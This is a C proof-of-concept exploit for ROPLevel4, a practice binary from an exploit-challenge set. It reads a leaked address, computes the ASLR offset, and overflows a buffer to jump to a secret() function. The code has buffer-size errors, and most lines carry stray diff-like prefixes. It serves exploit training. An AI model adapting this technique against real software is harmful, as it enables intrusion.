// Exploit for ROPLevel4
// PoC by Billy Ellis (@bellis1000)
// Full write-up available (soon?) on http://billyellis.net
// Download the ROPLevel4 binary from https://github.com/Billy-Ellis/Exploit-Challenges
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
- //probably should clear this up and split it in to separate functions but oh well ;-)
- int main(){
- //fixed addresses can be found by statically analysing the binary
- int fixedAddr = 0xc03c;
- int secretAddr = 0xbd28;
- //we'll use this eventually to store the final payload
- char exploit[128];
- //junk chars or "padding"
- char string[64] = {0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41};
- //this will be used to store the leaked address
- char readData[16];
- int fd[2];
- pid_t pid1;
- pipe(fd);
- pid1 = fork();
- //pipe stuff, thanks @liveoverflow for help with this :)
- if (pid1 == 0) {
- close(fd[1]);
- dup2(fd[0],0);
- //execute roplevel4
- execv("./roplevel4", NULL);
- }
- printf("[*] Reading leaked address...\n");
- //wait 3 secs to ensure file containing info leak is created successfully
- sleep(3);
- //open and read contents of file into readData
- FILE *file = fopen("./leak.txt","r");
- fgets(readData,32,file);
- fclose(file);
- //then convert the string to an int so we can actually use it for calculations
- int addr;
- sscanf(readData,"%x",&addr);
- printf("%x\n",addr);
- //calculate the ASLR "slide" or offset by working out the difference between the static addr & the real addr
- int offset = addr - fixedAddr;
- printf("[*] ASLR offset is: %x\n",offset);
- //calculate the real addr of the secret() function by adding the offset
- secretAddr = secretAddr + offset;
- printf("[*] Calculated address of secret() - %x\n",secretAddr);
- printf("[*] Crafting exploit payload...\n");
- //probably could have done this in a better way, but it works ;P
- //basically adds the bytes of the calculated address to the junk chars and stores them in the exploit array
- unsigned int one = secretAddr & 0xff;
- unsigned int two = (secretAddr>>8) & 0xff;
- unsigned int three = (secretAddr>>16) & 0xff;
- unsigned int four = (secretAddr>>24) & 0xff;
- sprintf(exploit,"%s%c%c%c",string,one,two,three);
- printf("[*] Payload crafted!\n[*] Executing...\n");
- close(fd[0]);
- //send the payload & hope for the best ;P
- //not 100% reliability, something to do with how I added the bytes to the string
- //I'll probably improve as I learn more C
- write(fd[1],exploit,512);
- return 0;
- }